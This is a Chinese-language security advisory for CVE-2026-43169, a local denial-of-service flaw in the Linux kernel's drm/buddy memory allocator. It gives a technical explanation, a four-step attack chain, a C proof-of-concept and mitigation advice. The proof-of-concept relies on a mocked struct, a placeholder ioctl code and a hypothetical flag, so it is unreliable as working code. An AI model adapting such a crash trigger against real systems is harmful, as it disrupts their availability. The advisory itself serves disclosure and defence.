CVE-2026-43169 CVSS 5.5 中危

CVE-2026-43169 Linux内核drm/buddy内存分配拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43169

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核drm/buddy组件存在安全漏洞。在进行连续内存分配或设置了大最小块尺寸的非连续分配时，系统会将请求尺寸向上取整。若取整后的尺寸超过内存管理器总大小，会触发BUG_ON断言导致内核崩溃。本地低权限攻击者利用此漏洞可造成系统拒绝服务。

技术细节

该漏洞源于Linux内核DRM子系统的buddy内存分配器未正确验证取整后的分配尺寸。当设置DRM_BUDDY_CONTIGUOUS_ALLOCATION标志时，请求尺寸通过roundup_pow_of_two()向上舍入；对于大min_block_size，则通过round_up()对齐。例如在10G VRAM上请求9G连续内存，会被舍入为16G，超出总容量。由于代码在取整后未校验结果是否超过mm->size，导致后续计算的order值大于max_order，触发BUG_ON断言。这是一个本地权限漏洞，无需用户交互即可触发，主要影响系统可用性。

攻击链分析

STEP 1

本地访问

攻击者获得本地系统的低权限用户访问权限。

STEP 2

构造请求

攻击者编写恶意程序，利用DRM接口发起特殊的显存分配请求，设置特定标志或大小使其触发roundup逻辑。

STEP 3

触发漏洞

内核drm/buddy模块处理请求时，取整后的尺寸超过内存上限，触发BUG_ON断言。

STEP 4

系统崩溃

内核断言触发导致系统崩溃或重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43169
 * This code attempts to trigger the vulnerability by requesting a memory allocation
 * that, when rounded up, exceeds the available VRAM size.
 * Note: This requires a system with a GPU driver using the drm/buddy allocator.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <drm/drm.h>

// Mocking the structure for demonstration purposes
struct drm_buddy_alloc {
    __u64 size;
    __u64 flags;
    // ... other fields
};

#define DRM_IOCTL_BUDDY_ALLOC 0x00 // Placeholder for actual ioctl code

int main() {
    int fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_buddy_alloc alloc;
    // Scenario: Request 9G on a 10G VRAM with CONTIGUOUS flag
    // roundup_pow_of_two(9GB) = 16GB > 10GB -> Trigger BUG_ON
    alloc.size = 9 * 1024 * 1024 * 1024ULL;
    alloc.flags = DRM_BUDDY_CONTIGUOUS_ALLOCATION; // Hypothetical flag value

    if (ioctl(fd, DRM_IOCTL_BUDDY_ALLOC, &alloc) != 0) {
        perror("Ioctl failed");
    } else {
        printf("Allocation succeeded (vulnerability likely patched or conditions not met)\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复补丁发布前的版本)

防御指南

临时缓解措施

建议系统管理员及时应用官方发布的内核补丁。若无法立即更新，可临时限制非特权用户对DRM设备的访问权限，以降低被本地攻击者利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表